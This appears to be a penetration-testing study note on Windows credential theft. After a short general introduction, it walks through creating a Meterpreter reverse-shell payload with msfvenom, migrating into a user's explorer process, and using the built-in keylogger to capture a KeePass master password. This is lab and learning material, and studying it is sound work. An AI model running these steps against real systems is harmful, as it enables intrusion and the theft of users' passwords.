## General Users and User Behavior Windows users have a variety of habits and actions when using the operating system. One important aspect of user behavior is the management of login information, known as credential management. This includes securely storing and managing usernames and passwords. However, malicious actors may use keylogging to steal login information. Keylogging is the act of recording keystrokes on a computer, often done to steal sensitive information such as login credentials. Another tactic used by malicious actors is exploitation, which takes advantage of vulnerabilities in software or systems to gain unauthorized access or control. It is important for Windows users to be aware of these issues and practice safe browsing and login habits, as well as keeping their systems updated to protect against exploitation. ## Commands Next step would be to look around to see if there is any useful information (Credential). Have a look at the user directories and see if there is some useful information in any of them. - Example Your enumeration efforts lead you to a .kdbx file. A quick Google should confirm our suspicion that this file is indeed very valuable! We can use Meterpreter's download command to recover this file. This file seems to be a credential database. The issue, however, is that the database is encrypted with a password. We could attempt to crack the password, but anyone who uses a credential database usually has the savvy to make sure the initial password is secure. We may have more success seeing how the user interacts with this database. Meterpreter has a built-in keylogger. This will be useful for extracting the user's keystrokes. However, we can't just start this keylogger and hope for the best since our shell is currently running in the SYSTEM context. SYSTEM won't be typing any keystrokes, so this won't help us. To capture the correct user's credentials, we will need to ensure that our shell is running in the context of that user. Create Meterpreter payload ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=exploitad LPORT="Listening port" -f psh -o shell.ps1 ``` Use [[• File Sharing (Windows - Linux)]] to import the payload Get the reverse shell Check if the users have any running processes on this machine ``` meterpreter\>ps | grep "explorer" ``` Migrate the process to the active process ``` meterpreter\>migrate NUMBER ``` Confirm that we are now running in the context of our target ``` meterpreter\>getuid ``` Start our keylogger ``` meterpreter\>keyscan_start ``` Wait... Dump captured keystrokes ``` meterpreter\>keyscan_dump ```